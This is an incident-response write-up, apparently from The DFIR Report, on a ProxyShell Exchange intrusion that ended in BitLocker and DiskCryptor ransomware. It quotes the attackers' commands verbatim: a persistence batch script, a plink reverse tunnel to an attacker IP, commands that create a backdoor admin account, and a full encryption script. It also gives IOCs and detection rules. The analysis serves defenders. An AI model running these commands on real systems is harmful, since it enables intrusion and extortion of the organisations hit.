{
	"id": "7a145927-c29d-41b2-96a9-5a0933b30d69",
	"created_at": "2026-04-06T02:12:35.417063Z",
	"updated_at": "2026-04-10T03:34:00.387139Z",
	"deleted_at": null,
	"sha1_hash": "39a7c810ea0bbe87870f054ce243a272e263efaf",
	"title": "Exchange Exploit Leads to Domain Wide Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1292989,
	"plain_text": "Exchange Exploit Leads to Domain Wide Ransomware\r\nBy editor\r\nPublished: 2021-11-15 · Archived: 2026-04-06 01:31:44 UTC\r\nIn late September 2021, we observed an intrusion in which initial access was gained by the threat actor exploiting\r\nmultiple vulnerabilities in Microsoft Exchange. The threat actors in this case were attributed to a group Microsoft\r\ntracks as PHOSPHORUS (possible overlap with UNC2448, NemesisKitten, and DEV-0270) which is suspected to\r\nbe an Iranian nation state operator.\r\nProxyShell was used to deploy multiple web shells which lead to discovery actions, dumping of LSASS, use of\r\nPlink and Fast Reverse Proxy to proxy RDP connections into the environment. Furthermore, the actors encrypted\r\nsystems domain wide, using BitLocker on servers and DiskCryptor on workstations, rather than affiliating with\r\nRansomware as a Service (RaaS) programs or building an encryptor from scratch.\r\nProxyShell is a name given to a combination of three vulnerabilities: CVE-2021-34473, CVE-2021-34523, and\r\nCVE-2021-31207. An attacker chaining the exploitation of these vulnerabilities could execute arbitrary code with\r\nSYSTEM privileges on Exchange servers. Here’s some more information on ProxyShell : CISA Alert, NCSC\r\nAlert, Mandiant, Zero Day Initiative.\r\nThe threat actors conducted this intrusion with almost no malware. 
It was a rare occurrence of a ransomware\r\nattack in which neither Cobalt Strike nor any other C2 framework was used.\r\nServices\r\nPrivate Threat Briefs: Over 25 private reports annually, such as this one but more concise and quickly\r\npublished post-intrusion.\r\nThreat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit,\r\nSliver, etc.\r\nAll Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, long-term\r\ntracking, data clustering, and other curated intel.\r\nPrivate Sigma Ruleset: Features 100+ Sigma rules derived from 40+ cases, mapped to ATT\u0026CK with test\r\nexamples.\r\nDFIR Labs: Offers cloud-based, hands-on learning experiences using real data from real intrusions.\r\nInteractive labs are available with different difficulty levels and can be accessed on-demand,\r\naccommodating various learning speeds.\r\nContact us today for a demo!\r\nCase Summary\r\nhttps://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\r\nPage 1 of 27\n\nWe observed an intrusion where an adversary exploited multiple Exchange vulnerabilities (ProxyShell) to drop\r\nmultiple web shells. Over the course of three days, three different web shells were dropped in publicly accessible\r\ndirectories. These web shells, exposed to the internet, were used to execute arbitrary code on the Microsoft\r\nExchange Server utilizing PowerShell and cmd.\r\nAfter gaining an initial foothold on the Exchange system, the threat actors started discovery by executing\r\ncommands like ipconfig, net, ping, systeminfo, and others, using the previously dropped web shells. This battery\r\nof initial discovery included a network call out to themoscowtimes[.]com. The threat actors repeated these tests\r\ntwice over the first two days. 
On the third day, the next phase of the intrusion was underway.\r\nSince the commands executed via the web shell run with SYSTEM level privileges, the threat actors took advantage\r\nof this and enabled the built-in account DefaultAccount, set its password and added it to the Administrators and Remote\r\nDesktop Users groups. The threat actors then dropped Plink and established an SSH tunnel to expose RDP over\r\nthe tunnel. They then connected to the Exchange server over RDP using the DefaultAccount account.\r\nThey then copied their tools into the environment via RDP, which was observed when CacheTask.zip was copied\r\nto disk. This compressed file had a few files in it:\r\nCacheTask.bat\r\nCacheTask.xml\r\ndllhost.exe\r\ninstall-proxy.bat\r\nRuntimeBroker\r\nRight after the transfer, the adversaries executed install-proxy.bat to create two directories and move\r\nCacheTask.bat, dllhost.exe and RuntimeBroker into their respective folders. A scheduled task was created and\r\nexecuted to run install-proxy.bat, which established network persistence via Fast Reverse Proxy (FRP), which\r\nwas used to proxy RDP traffic during the intrusion.\r\nUtilizing the Plink RDP connection, the threat actor dumped LSASS using Task Manager. Thirty minutes later, the\r\nthreat actor started using a domain administrator account.\r\nUsing the stolen Domain Admin account, the adversaries performed port scanning with KPortScan 3.0 and then\r\nmoved laterally using RDP. Targeted servers included backup systems and domain controllers. The threat actor\r\nalso deployed the FRP package to these systems after gaining access.\r\nFinally, the threat actors deployed setup.bat across the servers in the environment using RDP and then used an\r\nopen source disk encryption utility to encrypt the workstations. Setup.bat ran commands to enable BitLocker\r\nencryption, which resulted in the hosts being inoperable.\r\nTo encrypt workstations, an open source utility called DiskCryptor was utilized. 
This was dropped on the\r\nworkstations via RDP sessions and then executed to install the utility and set up the encryption. The utility required\r\na reboot to install a kernel mode driver and then another reboot to lock out access to the workstations.\r\nThe time to ransom (TTR) of this intrusion, from the first successful ProxyShell exploitation to ransom, was\r\naround 42 hours. If the blue team had failed to detect the intrusion up until the DefaultAccount being enabled, they\r\nwould have had 8 hours to respond and evict the threat actors before being ransomed.\r\nThe threat actors left a ransom note requesting 8,000 USD to get the encryption keys for the systems.\r\nTimeline\r\nAnalysis and reporting completed by @0xtornado \u0026 @v3t0_\r\nReviewed by @samaritan_o \u0026 @svch0st\r\nMITRE ATT\u0026CK\r\nInitial Access\r\nThis time we will talk about ProxyShell, which revealed itself around August 2021. Once again, the vulnerability\r\naffects Microsoft Exchange servers. Specifically, the on-prem versions identified as Exchange Server 2013,\r\nExchange Server 2016 and Exchange Server 2019. 
It is interesting to note how the ProxyShell vulnerability,\r\noriginally identified and exploited by Orange Tsai (@orange_8361), includes a chain of 3 different CVEs:\r\nCVE-2021-34473\r\nCVE-2021-34523\r\nCVE-2021-31207\r\nIn this specific scenario, we observed the presence and exploitation of all the CVEs indicated above;\r\nspecifically, the attacker was able to exploit a Pre-auth Path Confusion Leads to ACL Bypass (CVE-2021-34473),\r\nan Elevation of Privilege on Exchange PowerShell Backend (CVE-2021-34523), and finally a Post-auth Arbitrary-File-Write Leads to RCE (CVE-2021-31207). This last CVE allowed the creation of multiple web shells. The\r\nmethod used by the actor in this incident was to first use the elevated PowerShell privileges to run the following\r\ndiscovery cmdlets:\r\nGet-MailboxRegionalConfiguration\r\nGet-Mailbox\r\nGet-ExchangeServer\r\nGet-InboxRule\r\nThis was shortly followed by the cmdlet “New-ManagementRoleAssignment”, responsible for granting mailbox\r\nimport/export privileges, before running “New-MailboxExportRequest”. The cmdlet would export a mailbox to a\r\nprovided location with the .aspx extension. While the file is a legitimate .pst file, it contains plaintext web shell\r\ncode that is rendered by IIS when requested.\r\nBelow is an example of one of the IPs that successfully exploited the vulnerabilities:\r\nThree web shells were spotted during our investigation:\r\nThe login.aspx web shell is a simple web shell which takes a command and runs it using cmd.exe. We believe the\r\nthreat actor used aspx_qdajscizfzx.aspx to upload login.aspx and that’s why the parent process is w3wp. Here’s\r\nwhat the web shell looked like:\r\nThis is the web shell code for login.aspx:\r\nThe other two web shells were dropped upon the successful exploitation of ProxyShell. 
Running the file command on\r\nthese two web shells shows that they are actually PST files that contain web shell code:\r\n$ file *\r\naspx_gtonvbgidhh.aspx: Microsoft Outlook email folder (\u003e=2003)\r\naspx_qdajscizfzx.aspx: Microsoft Outlook email folder (\u003e=2003)\r\nThe first web shell, aspx_qdajscizfzx.aspx, can upload files and runs cmd.exe:\r\nThe second web shell, aspx_gtonvbgidhh.aspx, can upload files and runs powershell.exe:\r\nExecution\r\nThe threat actors executed a script named install-proxy.bat, containing the following lines of code:\r\n@echo off\r\ncd /D \"%~dp0\"\r\nmkdir C:\\ProgramData\\Microsoft\\Windows\\Runtime\\\r\nmkdir C:\\ProgramData\\Microsoft\\Windows\\DllHost\\\r\nmove /Y dllhost.exe C:\\ProgramData\\Microsoft\\Windows\\DllHost\\dllhost.exe\r\nmove /Y RuntimeBroker C:\\ProgramData\\Microsoft\\Windows\\Runtime\\RuntimeBroker\r\nmove /Y CacheTask.bat C:\\ProgramData\\Microsoft\\CacheTask.bat\r\nschtasks.exe /End /tn \"\\Microsoft\\Windows\\Maintenance\\CacheTask\"\r\nschtasks.exe /Delete /tn \"\\Microsoft\\Windows\\Maintenance\\CacheTask\"\r\nschtasks.exe /Create /F /XML CacheTask.xml /tn \"\\Microsoft\\Windows\\Maintenance\\CacheTask\"\r\nschtasks.exe /Run /tn \"\\Microsoft\\Windows\\Maintenance\\CacheTask\"\r\ndel /F CacheTask.xml\r\nstart /b \"\" cmd /c del \"%~f0\"\u0026exit /b\r\nThe script creates two directories, then moves files into their respective directories. It first stops and then deletes a\r\ntask named CacheTask if it exists. 
It then creates a scheduled task from the XML file, which executes\r\nCacheTask.bat.\r\nCacheTask.bat is a script that loops the execution of the Fast Reverse Proxy (FRP) binary:\r\n:loop\r\nC:\\ProgramData\\Microsoft\\Windows\\DllHost\\dllhost.exe\r\ngoto loop\r\nBelow is a screenshot of the dllhost.exe hash lookup in VirusTotal, matching Florian Roth’s Yara rule\r\nHKTL_PUA_FRP_FastReverseProxy_Oct21_1:\r\nThe C:\\ProgramData\\Microsoft\\Windows\\Runtime\\RuntimeBroker file is linked to the execution above, and\r\ncontained the following lines, which form a configuration file for FRP:\r\n[common]\r\nlog_level = trace\r\nlogin_fail_exit = true\r\n[RedactedHOSTNAME.RedactedDOMAIN_RedactedIP]\r\ntype = tcp\r\nremote_port = 10151\r\nplugin = http_proxy\r\nuse_encryption = true\r\nuse_compression = true\r\nThe above configuration creates an HTTP proxy bound to port 10151/tcp using encryption and compression.\r\nThe threat actors also dropped and executed plink.exe, creating a remote SSH tunnel to 148.251.71[.]182\r\n(tcp[.]symantecserver[.]co) in order to reach the RDP port on the Exchange system over the internet:\r\n\"powershell.exe\" /c echo y | plink.exe -N -T -R 0.0.0.0:1251:127.0.0.1:3389 148.251.71.182 -P 22 -l f\r\nIn the command line above you can see several options being used:\r\n-N : To avoid starting the shell\r\n-T : To avoid the allocation of a pseudo-terminal\r\n-R : Forward remote port to local address\r\n-P 22 : Port number\r\n-l forward : Login name\r\n-pw Socks@123 : Login password\r\n-no-antispoof : To omit anti-spoofing prompt after authentication\r\nAfter running the above Plink command, the threat actors had RDP access into the environment over the SSH\r\ntunnel.\r\nPersistence\r\nValid Accounts\r\nTo maintain persistence 
on patient 0, the threat actors leveraged the built-in DefaultAccount. It is a user-neutral\r\naccount that can be used to run processes that are either multi-user aware or user-agnostic. The DSMA is disabled\r\nby default on the desktop SKUs (full Windows SKUs) and WS 2016 with the Desktop (Reference).\r\nTo achieve persistence, the threat actors enabled the DefaultAccount by running the following command, using a\r\nweb shell:\r\n\"powershell.exe\" /c net user DefaultAccount /active:yes\r\nAfter activating the account, the threat actors set the password of this account to P@ssw0rd and added it to the\r\nAdministrators and Remote Desktop Users groups.\r\n\"powershell.exe\" /c net user DefaultAccount P@ssw0rd\r\n\"powershell.exe\" /c net localgroup \"Remote Desktop Users\" /Add DefaultAccount\r\n\"powershell.exe\" /c net localgroup Administrators /Add DefaultAccount\r\nPrivilege Escalation\r\nProxyShell exploitation provided the threat actors with NT AUTHORITY\\SYSTEM privileges. Those privileges\r\nallowed them to enable the DefaultAccount account to get access to the mail server using valid credentials.\r\nMoreover, the threat actors managed to dump LSASS and steal a domain administrator account, which was used\r\nto perform lateral movement.\r\nDefense Evasion\r\nAdvanced defense evasion techniques, such as impairing defenses or process injections, were not used during this\r\nintrusion. 
However, the threat actors performed masquerading with many of their tools:\r\nThey created the login.aspx web shell in the same folder as the legitimate OWA login page.\r\nThey renamed Fast Reverse Proxy to dllhost.exe to remain stealthy.\r\nThey created the scheduled task with the name “\\Microsoft\\Windows\\Maintenance\\CacheTask” to stay unnoticed.\r\nCredential Access\r\nLSASS Dump\r\nThe threat actors dumped the LSASS process manually using Task Manager (CAR-2019-08-001):\r\nFile created:\r\nRuleName: -\r\nUtcTime: REDACTED 10:40:24.958\r\nProcessGuid: {BF388D9C-AB02-614D-B552-000000000700}\r\nProcessId: 17480\r\nImage: C:\\Windows\\system32\\taskmgr.exe\r\nTargetFilename: C:\\Users\\DefaultAccount\\AppData\\Local\\Temp\\2\\lsass.DMP\r\nTo facilitate the LSASS dump exfiltration, the threat actors created a zip archive named lsass.zip:\r\nFile created:\r\nRuleName: -\r\nUtcTime: REDACTED 10:40:48.698\r\nProcessGuid: {BF388D9C-AADF-614D-A052-000000000700}\r\nProcessId: 17412\r\nImage: C:\\Windows\\Explorer.EXE\r\nTargetFilename: C:\\Users\\DefaultAccount\\AppData\\Local\\Temp\\2\\lsass.zip\r\nDiscovery\r\nEnvironment Discovery\r\nAs previously mentioned, we saw multiple cmdlets related to Exchange:\r\nGet-MailboxRegionalConfiguration\r\nGet-Mailbox\r\nGet-ExchangeServer\r\nGet-InboxRule\r\nUsing the dropped web shells, the threat actors ran the following commands:\r\nPort Scanning\r\nThe threat actors used KPortScan 3.0, a port scanning tool widely used on hacking forums, to perform network\r\nscanning on the internal network:\r\nLateral Movement\r\nThe threat actors mainly used Remote Desktop Services (RDP) to move laterally to other servers using the stolen\r\ndomain admin account. 
Below is an extract focusing on RDP activity from patient 0:\r\nThe threat actors also appeared to use Impacket’s wmiexec to perform lateral movement on one of the domain\r\ncontrollers.\r\nWe do not have a clear explanation for that behavior. However, we strongly believe that this was related to the\r\ndeployment of the encryption script, as it happened just a few minutes before its manual execution on servers.\r\nCollection\r\nNo data collection was observed in this intrusion beyond the dumped LSASS, which the threat actors packaged in a zip\r\narchive:\r\nFile created:\r\nRuleName: -\r\nUtcTime: REDACTED 10:40:48.698\r\nProcessGuid: {BF388D9C-AADF-614D-A052-000000000700}\r\nProcessId: 17412\r\nImage: C:\\Windows\\Explorer.EXE\r\nTargetFilename: C:\\Users\\DefaultAccount\\AppData\\Local\\Temp\\2\\lsass.zip\r\nCreationUtcTime: REDACTED 10:40:48.697\r\nCommand and Control\r\nNo Command and Control frameworks were used during this intrusion. Initial access to the environment was\r\nperformed using the web shell upon the exploitation of ProxyShell, then using valid accounts and Remote Desktop\r\nServices.\r\nThreat actors created an SSH tunnel to 148.251.71[.]182 using plink in order to forward RDP access:\r\nLooking at this IP address on VirusTotal, we can observe that all “Communicating Files” related to it trigger FRP\r\nAV signatures or Yara rules:\r\nWe can conclude that those threat actors are accustomed to this protocol tunneling technique.\r\nExfiltration\r\nApart from lsass.zip, no data exfiltration or staging was observed during this intrusion.\r\nImpact\r\nIn this intrusion the threat actors used BitLocker and an open source encryptor, DiskCryptor, in order to encrypt\r\nsystems domain wide. 
On servers a batch script named setup.bat was used and on workstations the GUI\r\napplication named dcrypt.exe (DiskCryptor) was executed instead. Both were executed by the threat actors after\r\nRDP login to each host.\r\nOn servers they copied over a file named setup.bat.\r\nThey then manually executed the script, which disables the event log service, enables BitLocker (and RDP),\r\nprepares the system drive using BdeHdCfg (a BitLocker drive encryption preparation tool), restarts the system, and\r\ndeletes itself.\r\nBelow are the commands executed by the script:\r\nnet stop eventlog /y\r\nsc config TermService start= auto\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v TSEnabled /t REG_DWORD /d 1 /f\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t RE\r\nnetsh advfirewall firewall add rule name=\"Terminal Server\" dir=in action=allow protocol=TCP localport=3389\r\nnet start TermService\r\nREG ADD HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE /v EnableBDEWithNoTPM /t REG_DWORD /d 1 /f\r\nREG ADD HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE /v UseAdvancedStartup /t REG_DWORD /d 1 /f\r\nREG ADD HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE /v UseTPM /t REG_DWORD /d 2 /f\r\nREG ADD HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE /v UseTPMKey /t REG_DWORD /d 2 /f\r\nREG ADD HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE /v UseTPMKeyPIN /t REG_DWORD /d 2 /f\r\nREG ADD HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE /V RecoveryKeyMessageSource /t REG_DWORD /d 2 /f\r\nREG ADD HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE /v UseTPMPIN /t REG_DWORD /d 2 /f\r\nREG ADD 
HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE /v RecoveryKeyMessage /t REG_SZ /d \" +-+-+- Your drives are Encryp\r\npowershell -c \"Import-Module ServerManager; ADD-WindowsFeature BitLocker -Restart\"\r\npowershell -c \"Install-WindowsFeature BitLocker –IncludeAllSubFeature -IncludeManagementTools -Restart\"\r\npowershell -c \"Initialize-Tpm -AllowClear -AllowPhysicalPresence -ErrorAction SilentlyContinue\"\r\npowershell -c \"Get-Service -Name defragsvc -ErrorAction SilentlyContinue | Set-Service -Status Running -ErrorAc\r\npowershell -c \"BdeHdCfg -target $env:SystemDrive shrink -quiet -restart\"\r\nsc config eventlog start= auto\r\ncmd /c del \"C:\\Windows\\setup.bat\"\r\ncmd /c del \"C:\\Users\\REDACTED\\Desktop\\setup.bat\"\r\nRunning this script on servers made them inaccessible, and the following BitLocker encryption message was\r\nshown when restarted:\r\nA binary called dcrypt.exe was dropped on a backup server and immediately deleted. While this utility was not\r\nexecuted on any servers in the environment, it was deployed to all the workstations.\r\nThe executable used is the current release of the installer for the utility DiskCryptor.\r\nWe are unsure why DiskCryptor was used on workstations, but we believe it may have something to do with not all\r\nworkstation versions supporting BitLocker.\r\nhttps://en.wikipedia.org/wiki/BitLocker\r\nUse of this utility on workstations ensures reliable encryption without the need to develop their own ransomware\r\nor get into a ransomware as a service affiliate program.\r\nThis executable, however, reminds you on install that it is “beta” software.\r\nThe setup process then works like most Windows installers and requires a reboot of the system. 
During installation a\r\nkernel mode driver is added to support the encryption process.\r\nAfter reboot, the program GUI allows you to configure the encryption options.\r\nAfter encryption completed, the systems were rebooted and left with the following screen:\r\nThe threat actors left their note requesting 8,000 USD on a domain controller which was not rebooted or locked\r\nout. The note pointed to Telegram and ProtonMail contacts.\r\nIOCs\r\nAll artifacts including web shells, files, IPs, etc. were added to our servers in September.\r\nNetwork\r\nPlink\r\n148.251.71.182\r\ntcp.symantecserver.co\r\ndllhost.exe connected to the following IPs over 443\r\n18.221.115.241\r\n217.23.5.42\r\n37.139.3.208\r\n148.251.71.182\r\nConnected to aspx_gtonvbgidhh.aspx\r\n198.144.189.74\r\n86.57.38.156\r\nFile\r\n- dcrypt.exe\r\n- dllhost.exe\r\n- login.aspx\r\n- aspx_gtonvbgidhh.aspx\r\n- aspx_qdajscizfzx.aspx\r\nDetections\r\nNetwork\r\nET INFO User-Agent (python-requests) Inbound to Webserver\r\nalert tcp any any -\u003e [$HOME_NET,$HTTP_SERVERS] [443,444] (msg:\"ET EXPLOIT Possible Microsoft Exchange\r\nalert tcp any any -\u003e [$HOME_NET,$HTTP_SERVERS] [443,444] (msg:\"ET EXPLOIT Possible Microsoft Exchange\r\nalert tcp any any -\u003e [$HOME_NET,$HTTP_SERVERS] [443,444] (msg:\"ET EXPLOIT Possible Microsoft Exchange\r\nalert tcp any any -\u003e [$HOME_NET,$HTTP_SERVERS] any (msg:\"ET EXPLOIT Microsoft Exchange Pre-Auth Path\r\nalert tcp [$HOME_NET,$HTTP_SERVERS] any -\u003e any any (msg:\"ET EXPLOIT Vulnerable Microsoft Exchange Se\r\nalert tcp any any -\u003e [$HOME_NET,$HTTP_SERVERS] [443,444] (msg:\"ET EXPLOIT Microsoft Exchange SUID Dis\r\nalert tcp any any -\u003e [$HOME_NET,$HTTP_SERVERS] any (msg:\"ET EXPLOIT Microsoft Exchange Pre-Auth Path\r\nalert tcp any any -\u003e [$HOME_NET,$HTTP_SERVERS] [443,444] (msg:\"ET EXPLOIT Possible Microsoft Exchange\r\nalert tcp any any -\u003e [$HOME_NET,$HTTP_SERVERS] [443,444] (msg:\"ET EXPLOIT Possible Microsoft Exchange\r\nalert tcp any any -\u003e [$HOME_NET,$HTTP_SERVERS] [443,444] (msg:\"ET EXPLOIT Possible Microsoft Exchange\r\nalert tcp any any -\u003e [$HOME_NET,$HTTP_SERVERS] any (msg:\"ET EXPLOIT Microsoft Exchange Pre-Auth Path\r\nalert tcp [$HOME_NET,$HTTP_SERVERS] any -\u003e any any (msg:\"ET EXPLOIT Vulnerable Microsoft Exchange Se\r\nalert tcp any any -\u003e [$HOME_NET,$HTTP_SERVERS] [443,444] (msg:\"ET EXPLOIT Microsoft Exchange SUID Dis\r\nalert tcp any any -\u003e [$HOME_NET,$HTTP_SERVERS] any (msg:\"ET EXPLOIT Microsoft Exchange Pre-Auth Path\r\nSigma\r\nScheduled Task Creation\r\nWebshell Detection With Command Line Keywords\r\nSystem File Execution Location Anomaly\r\nFile 
Created with System Process Name\r\nExfiltration and Tunneling Tools Execution\r\nSuspicious Plink Remote Forwarding\r\nImpacket Lateralization Detection\r\nLSASS Memory Dump File Creation\r\nYara\r\nValhalla/Loki Yara Sigs\r\nWEBSHELL_ASPX_ProxyShell_Aug21_2\r\nWEBSHELL_ASPX_ProxyShell_Aug21_2\r\nSUSP_ASPX_PossibleDropperArtifact_Aug21\r\nSUSP_ASPX_PossibleDropperArtifact_Aug21\r\n/*\r\n YARA Rule Set\r\n Author: The DFIR Report\r\n Date: 2021-11-14\r\n Identifier: 6898\r\n Reference: https://thedfirreport.com/\r\n*/\r\n/* Rule Set ----------------------------------------------------------------- */\r\nimport \"pe\"\nrule sig_6898_login_webshell {\n meta:\n description = \"6898 - file login.aspx\"\n author = \"The DFIR Report\"\n reference = \"https://thedfirreport.com/\"\n date = \"2021-11-14\"\n hash1 = \"98ccde0e1a5e6c7071623b8b294df53d8e750ff2fa22070b19a88faeaa3d32b0\"\n strings:\n $s1 = \"c:\\\\windows\\\\system32\\\\cmd.exe $s2 = \"myProcessStartInfo.UseShellExecute = false \" fullword ascii\n $s3 = \"\\\"Microsoft.Exchange.ServiceHost.exe0r\" fullword ascii\n $s4 = \"myProcessStartInfo.Arguments=xcmd.text \" fullword ascii\n $s5 = \"myProcess.StartInfo = myProcessStartInfo \" fullword ascii\n $s6 = \"myProcess.Start() \" fullword ascii\n $s7 = \"myProcessStartInfo.RedirectStandardOutput = true \" fullword ascii\n $s8 = \"myProcess.Close() \" fullword ascii\n $s9 = \"Dim myStreamReader As StreamReader = myProcess.StandardOutput \" fullword ascii\n $s10 = \"\u003c%@ import Namespace='system.IO' %\u003e\" fullword ascii\n $s11 = \"\u003c%@ import Namespace='System.Diagnostics' %\u003e\" fullword ascii\n $s12 = \"Dim myProcess As New Process() \" fullword ascii\n $s13 = \"Dim myProcessStartInfo As New ProcessStartInfo(xpath.text) \" fullword ascii\n $s14 = \"example.org0\" fullword ascii\n $s16 = \"\n\n$s6 = \"return httpPostedFile.FileName + \\\" Uploaded 
to: \\\" + dstFile;\" fullword ascii\r\n $s7 = \"httpPostedFile.InputStream.Read(buffer, 0, fileLength);\" fullword ascii\r\n $s8 = \"int fileLength = httpPostedFile.ContentLength;\" fullword ascii\r\n $s9 = \"result = result + Environment.NewLine + \\\"ERROR:\\\" + Environment.NewLine + error;\" fullword ascii\r\n $s10 = \"ALAAAAAAAAAAA\" fullword ascii /* base64 encoded string ',' */\r\n $s11 = \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\" ascii /* base64\r\n $s12 = \"var result = delimiter + this.RunIt(Request.Params[\\\"exec_code\\\"]) + delimiter;\" fullword ascii\r\n $s13 = \"AAAAAAAAAAAAAAAAAAAAAAAA6AAAAAAAAAAAAAAA\" ascii /* base64 encoded string ':' */\r\n $s14 = \"using (StreamReader streamReader = process.StandardOutput)\" fullword ascii\r\n $s15 = \"private string RunIt(string command)\" fullword ascii\r\n $s16 = \"Process process = Process.Start(info);\" fullword ascii\r\n $s17 = \"ProcessStartInfo info = new ProcessStartInfo();\" fullword ascii\r\n $s18 = \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6\" ascii /* base64 encoded string ':' */\r\n $s19 = \"6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\" ascii /* base64 encoded string\r\n $s20 = \"if (Request.Params[\\\"exec_code\\\"] == \\\"put\\\")\" fullword ascii\r\n condition:\r\n uint16(0) == 0x4221 and filesize \u003c 800KB and\r\n 8 of them\r\n}\r\nrule aspx_qdajscizfzx_webshell {\r\n meta:\r\n description = \"6898 - file aspx_qdajscizfzx.aspx\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/\"\r\n date = \"2021-11-14\"\r\n hash1 = \"60d22223625c86d7f3deb20f41aec40bc8e1df3ab02cf379d95554df05edf55c\"\r\n strings:\r\n $s1 = \"info.FileName = \\\"cmd.exe\\\";\" fullword ascii\r\n $s2 = \"info.UseShellExecute = false;\" fullword ascii\r\n $s3 = \"info.Arguments = \\\"/c \\\" + command;\" fullword ascii\r\n $s4 = \"var dstFile = Path.Combine(dstDir, Path.GetFileName(httpPostedFile.FileName));\" fullword ascii\r\n 
$s5 = \"using (StreamReader streamReader = process.StandardError)\" fullword ascii\r\n $s6 = \"return httpPostedFile.FileName + \\\" Uploaded to: \\\" + dstFile;\" fullword ascii\r\n $s7 = \"httpPostedFile.InputStream.Read(buffer, 0, fileLength);\" fullword ascii\r\n $s8 = \"int fileLength = httpPostedFile.ContentLength;\" fullword ascii\r\n $s9 = \"result = result + Environment.NewLine + \\\"ERROR:\\\" + Environment.NewLine + error;\" fullword ascii\r\n $s10 = \"ALAAAAAAAAAAA\" fullword ascii /* base64 encoded string ',' */\r\n $s11 = \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\" ascii /* base64\r\n $s12 = \"var result = delimiter + this.RunIt(Request.Params[\\\"exec_code\\\"]) + delimiter;\" fullword ascii\r\n $s13 = \"AAAAAAAAAAAAAAAAAAAAAAAA6AAAAAAAAAAAAAAA\" ascii /* base64 encoded string ':' */\r\n $s14 = \"using (StreamReader streamReader = process.StandardOutput)\" fullword ascii\r\n $s15 = \"private string RunIt(string command)\" fullword ascii\r\n $s16 = \"Process process = Process.Start(info);\" fullword ascii\r\n $s17 = \"ProcessStartInfo info = new ProcessStartInfo();\" fullword ascii\r\n $s18 = \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6\" ascii /* base64 encoded string ':' */\r\n $s19 = \"6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\" ascii /* base64 encoded string\r\nhttps://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\r\nPage 25 of 27\n\n$s20 = \"if (Request.Params[\\\"exec_code\\\"] == \\\"put\\\")\" fullword ascii\r\n condition:\r\n uint16(0) == 0x4221 and filesize \u003c 800KB and\r\n 8 of them\r\n}\r\nrule sig_6898_dcrypt {\r\n meta:\r\n description = \"6898 - file dcrypt.exe\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/\"\r\n date = \"2021-11-14\"\r\n hash1 = \"02ac3a4f1cfb2723c20f3c7678b62c340c7974b95f8d9320941641d5c6fd2fee\"\r\n strings:\r\n $s1 = \"For more detailed information, please visit 
http://www.jrsoftware.org/ishelp/index.php?topic=setupc\r\n $s2 = \"Causes Setup to create a log file in the user's TEMP directory.\" fullword wide\r\n $s3 = \"Prevents the user from cancelling during the installation process.\" fullword wide\r\n $s4 = \"/http://crl4.digicert.com/sha2-assured-cs-g1.crl0L\" fullword ascii\r\n $s5 = \"Same as /LOG, except it allows you to specify a fixed path/filename to use for the log file.\" fullw\r\n $s6 = \"/PASSWORD=password\" fullword wide\r\n $s7 = \"The Setup program accepts optional command line parameters.\" fullword wide\r\n $s8 = \"Overrides the default component settings.\" fullword wide\r\n $s9 = \"Specifies the password to use.\" fullword wide\r\n $s10 = \"/MERGETASKS=\\\"comma separated list of task names\\\"\" fullword wide\r\n $s11 = \"Instructs Setup to load the settings from the specified file after having checked the command line\r\n $s12 = \"/DIR=\\\"x:\\\\dirname\\\"\" fullword wide\r\n $s13 = \"http://diskcryptor.org/ \" fullword wide\r\n $s14 = \"Prevents Setup from restarting the system following a successful installation, or after a Preparin\r\n $s15 = \"HBPLg.sse\" fullword ascii\r\n $s16 = \"/LOG=\\\"filename\\\"\" fullword wide\r\n $s17 = \"Overrides the default folder name.\" fullword wide\r\n $s18 = \"Overrides the default setup type.\" fullword wide\r\n $s19 = \"Overrides the default directory name.\" fullword wide\r\n $s20 = \"* AVz'\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 5000KB and\r\n ( pe.imphash() == \"48aa5c8931746a9655524f67b25a47ef\" or 8 of them )\r\n}\r\nMITRE\r\nExploit Public-Facing Application – T1190\r\nOS Credential Dumping – T1003\r\nNetwork Service Scanning – T1046\r\nRemote Desktop Protocol – T1021.001\r\nAccount Manipulation – T1098\r\nValid Accounts – T1078\r\nProtocol Tunneling – T1572\r\nIngress Tool Transfer – T1105\r\nMatch Legitimate 
